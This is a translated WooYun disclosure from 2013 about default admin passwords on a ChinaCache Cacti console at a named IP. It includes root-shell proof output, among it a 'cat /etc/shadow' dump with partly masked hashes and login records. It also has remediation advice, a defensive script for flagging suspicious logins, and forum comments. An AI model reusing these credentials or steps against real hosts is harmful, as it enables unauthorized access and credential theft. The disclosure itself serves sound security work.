
Vulnerability summary

Defect ID: wooyun-2013-032391

Title: Weak password on the Cacti admin console of ChinaCache's monitoring service (server can be rooted)

Affected vendor: ChinaCache

Author: 猪猪侠

Submitted: 2013-07-26 13:54

Fixed: 2013-09-09 13:55

Published: 2013-09-09 13:55

Vulnerability type: weak service password

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2013-07-26: Details sent to the vendor; awaiting vendor handling
2013-07-26: Vendor confirmed; details disclosed to the vendor only
2013-08-05: Details disclosed to core white hats and relevant domain experts
2013-08-15: Details disclosed to regular white hats
2013-08-25: Details disclosed to intern white hats
2013-09-09: Details disclosed to the public

Brief description:

The server sits in a very high-end data center; large vendors such as NetEase, Sohu, Sina, 360 and Baidu all have servers there.
If it were exploited indirectly, the damage would be very severe.

Detailed description:

Cacti URL:
http://220.181.47.151/
Weak passwords:
admin:admin
guest:admin

[Screenshot: chinacache_cacti.jpg]

Proof of vulnerability:

sh-3.2# /sbin/ifconfig -a
/sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:13:72:65:28:5C
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
eth1 Link encap:Ethernet HWaddr 00:13:72:65:28:5D
inet addr:220.181.47.151 Bcast:220.181.47.159 Mask:255.255.255.240
inet6 addr: fe80::213:72ff:fe65:285d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:71655106 errors:0 dropped:0 overruns:0 frame:0
TX packets:28384460 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:10572923065 (9.8 GiB) TX bytes:4031517289 (3.7 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1020776 errors:0 dropped:0 overruns:0 frame:0
TX packets:1020776 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:108876144 (103.8 MiB) TX bytes:108876144 (103.8 MiB)
peth1 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:100902104 errors:0 dropped:0 overruns:0 frame:0
TX packets:34752238 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:13784303050 (12.8 GiB) TX bytes:4762685018 (4.4 GiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
veth0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
veth2 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
veth3 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
veth4 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
vif0.0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
vif0.1 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:36967271 errors:0 dropped:0 overruns:0 frame:0
TX packets:86224028 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4855610108 (4.5 GiB) TX bytes:12810458166 (11.9 GiB)
vif0.2 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
vif0.3 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
vif0.4 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:70 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:14808 (14.4 KiB)
xenbr1 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:54265731 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7918369069 (7.3 GiB) TX bytes:0 (0.0 b)
sh-3.2# cat /etc/shadow
cat /etc/shadow
root:$1$x8z81Z1H$tTHI****egXf4AYimjO5U.:15519:0:99999:7:::
bin:*:14999:0:99999:7:::
daemon:*:14999:0:99999:7:::
adm:*:14999:0:99999:7:::
lp:*:14999:0:99999:7:::
sync:*:14999:0:99999:7:::
shutdown:*:14999:0:99999:7:::
halt:*:14999:0:99999:7:::
mail:*:14999:0:99999:7:::
news:*:14999:0:99999:7:::
uucp:*:14999:0:99999:7:::
operator:*:14999:0:99999:7:::
games:*:14999:0:99999:7:::
gopher:*:14999:0:99999:7:::
ftp:*:14999:0:99999:7:::
nobody:*:14999:0:99999:7:::
nscd:!!:14999:0:99999:7:::
distcache:!!:14999:0:99999:7:::
vcsa:!!:14999:0:99999:7:::
ais:!!:14999:0:99999:7:::
pcap:!!:14999:0:99999:7:::
ntp:!!:14999:0:99999:7:::
squid:!!:14999:0:99999:7:::
apache:!!:14999:0:99999:7:::
rpc:!!:14999:0:99999:7:::
named:!!:14999:0:99999:7:::
mailnull:!!:14999:0:99999:7:::
smmsp:!!:14999:0:99999:7:::
rpcuser:!!:14999:0:99999:7:::
nfsnobody:!!:14999:0:99999:7:::
sshd:!!:14999:0:99999:7:::
webalizer:!!:14999:0:99999:7:::
luci:!!:14999:0:99999:7:::
dbus:!!:14999:0:99999:7:::
avahi:!!:14999:0:99999:7:::
xfs:!!:14999:0:99999:7:::
hsqldb:!!:14999:0:99999:7:::
ricci:!!:14999:0:99999:7:::
haldaemon:!!:14999:0:99999:7:::
avahi-autoipd:!!:14999:0:99999:7:::
pegasus:!!:14999:0:99999:7:::
gdm:!!:14999:0:99999:7:::
sabayon:!!:14999:0:99999:7:::
mysql:!!:15001::::::
admin:$1$.XZjnzjb$b/******Dlcg/wrPWMA1l2.:15023:0:99999:7:::
sh-3.2# cat /etc/hosts
cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
sh-3.2# uname -a
uname -a
Linux localhost.localdomain 2.6.18-194.el5xen #1 SMP Fri Apr 2 15:34:40 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# last -20
last -20
admin pts/1 61.135.207.195 Thu Jul 25 15:35 - 15:37 (00:01)
admin pts/1 61.135.207.195 Thu Jul 11 16:12 - 16:46 (00:33)
admin pts/1 220.181.64.20 Tue Jun 18 10:15 - 11:51 (01:35)
admin pts/1 220.181.64.20 Sun Jun 16 23:18 - 23:30 (00:11)
admin pts/1 220.181.64.20 Sat Jun 8 11:36 - 11:40 (00:04)
admin pts/1 220.181.64.19 Fri Jun 7 17:15 - 18:08 (00:52)
admin pts/1 220.181.64.20 Mon May 27 11:11 - 13:32 (02:21)
admin pts/1 220.181.64.21 Fri May 24 13:39 - 14:06 (00:27)
admin pts/1 220.181.64.21 Tue May 21 10:09 - 14:33 (04:23)
admin pts/1 220.181.64.21 Sat May 18 02:39 - 03:10 (00:30)
admin pts/1 220.181.64.21 Tue May 7 10:48 - 13:00 (02:11)
admin pts/1 220.181.64.20 Wed Apr 17 17:45 - 17:52 (00:06)
admin pts/1 220.181.64.20 Wed Apr 10 15:07 - 18:07 (03:00)
root pts/1 113.31.38.21 Wed Mar 13 12:00 - 12:00 (00:00)
admin pts/1 111.196.233.62 Sat Mar 9 13:31 - 13:32 (00:00)
admin pts/1 220.181.64.20 Tue Feb 26 15:57 - 18:05 (02:07)
admin pts/1 220.181.64.20 Tue Feb 26 12:06 - 15:55 (03:49)
admin pts/1 220.181.64.20 Tue Feb 26 10:33 - 10:49 (00:15)
admin pts/1 220.181.64.21 Thu Jan 24 11:52 - 18:01 (06:08)
admin pts/2 220.181.64.21 Mon Jan 21 17:32 - 18:08 (00:36)
wtmp begins Wed Jan 26 03:37:41 2011
sh-3.2# ping hd.360.cn -c 2
ping hd.360.cn -c 2
PING hd-b.360.cn (220.181.47.91) 56(84) bytes of data.
64 bytes from 220.181.47.91: icmp_seq=1 ttl=62 time=0.638 ms
64 bytes from 220.181.47.91: icmp_seq=2 ttl=62 time=0.619 ms
--- hd-b.360.cn ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 5001ms
rtt min/avg/max/mdev = 0.619/0.628/0.638/0.026 ms
sh-3.2#
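The `last -20` output above shows that most admin logins come from a single 220.181.64.x range, with a few from elsewhere and one direct root login. As an added example (not part of the original report), the following script parses `last` output of that shape and flags logins from outside an assumed management network and any direct root login; the 220.181.64.0/24 trusted range is an assumption for illustration, and the sample lines are a constructed subset copied from the report.

```python
"""Review `last` output for logins outside the expected management network.

Added example, not from the original report. TRUSTED_NETS is an assumption.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# Assumed management network: the bulk of the admin logins in the report come from here.
TRUSTED_NETS = [ipaddress.ip_network("220.181.64.0/24")]

# Constructed sample: a subset of the report's `last -20` lines, plus the trailer.
SAMPLE_LAST = """\
admin pts/1 61.135.207.195 Thu Jul 25 15:35 - 15:37 (00:01)
admin pts/1 220.181.64.20 Tue Jun 18 10:15 - 11:51 (01:35)
root pts/1 113.31.38.21 Wed Mar 13 12:00 - 12:00 (00:00)
admin pts/1 111.196.233.62 Sat Mar 9 13:31 - 13:32 (00:00)
admin pts/2 220.181.64.21 Mon Jan 21 17:32 - 18:08 (00:36)
wtmp begins Wed Jan 26 03:37:41 2011
"""

# user, tty, IPv4 source, then the free-form time span
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(.*)$")


def parse_last(text: str) -> List[Dict[str, str]]:
    """Return one record per login line; the 'wtmp begins' trailer is skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # trailer or malformed line: no IPv4 in the third field
        user, tty, host, when = m.groups()
        records.append({"user": user, "tty": tty, "host": host, "when": when})
    return records


def suspicious_logins(records: List[Dict[str, str]],
                      trusted=TRUSTED_NETS) -> List[Tuple[str, str, str]]:
    """Flag logins from outside the trusted nets and any direct root login."""
    findings = []
    for r in records:
        addr = ipaddress.ip_address(r["host"])
        reasons = []
        if not any(addr in net for net in trusted):
            reasons.append("untrusted source")
        if r["user"] == "root":
            reasons.append("direct root login")
        if reasons:
            findings.append((r["user"], r["host"], ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for user, host, why in suspicious_logins(parse_last(SAMPLE_LAST)):
        print(f"{user:8} {host:16} {why}")
```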

Remediation:

#1 Apply strict access-control rules to the Cacti admin URL.
#2 Eliminate default passwords.

Copyright notice: when reposting, please credit the source 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2013-07-26 17:18

Vendor reply:

Thanks to @猪猪侠 for reporting this security vulnerability.
Since this device is not part of an important system and would not cause a major security impact to ChinaCache, we rate it "Low" under WooYun's Rank scheme, but award the maximum score for "Low", 5 points, as thanks.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-07-26 14:01 | niliu verified white hat ( core white hat | Rank:1542 vulnerabilities:206 | swimming against the current)

    ......

  2. 2013-07-26 14:02 | dyun ( regular white hat | Rank:102 vulnerabilities:15 | [code][/code])

    You know too much...

  3. 2013-07-26 14:09 | 天朝城管 ( regular white hat | Rank:116 vulnerabilities:35 | don't wait until fate plays you before you start playing for keeps)

    Open up, SF Express delivery!

  4. 2013-07-26 14:29 | circus ( intern white hat | Rank:54 vulnerabilities:4 | you will say a word for the sake of a thing, and for the sake of a word you will...)

    mark!

  5. 2013-07-26 14:54 | B1acken ( regular white hat | Rank:174 vulnerabilities:56 | scrub)

    OP, you know too much

  6. 2013-07-26 15:33 | j0ck ( intern white hat | Rank:45 vulnerabilities:5 | hello~)

    Cacti weak password, then command execution through the scripts section?

  7. 2013-07-26 16:22 | winsyk ( regular white hat | Rank:108 vulnerabilities:16 | the older I get, the lonelier)

    Bro, you went way too deep :)

  8. 2013-07-26 22:39 | 无敌L.t.H ( passer-by | Rank:21 vulnerabilities:4 | ……肉肉捉活,亭长放解)

    Every ChinaCache device that has a problem is "not an important system"; next time I suggest just closing it and walking away rather than posting on WooYun.

  9. 2013-08-26 12:25 | Leon ( passer-by | Rank:25 vulnerabilities:6 | never a day's peace)

    I remember this has been around for at least half a year.

  10. 2013-09-09 21:19 | hack2012 ( intern white hat | Rank:31 vulnerabilities:3 | following information security http://www.waitalone.cn/)

    Where is the part that gives root directly?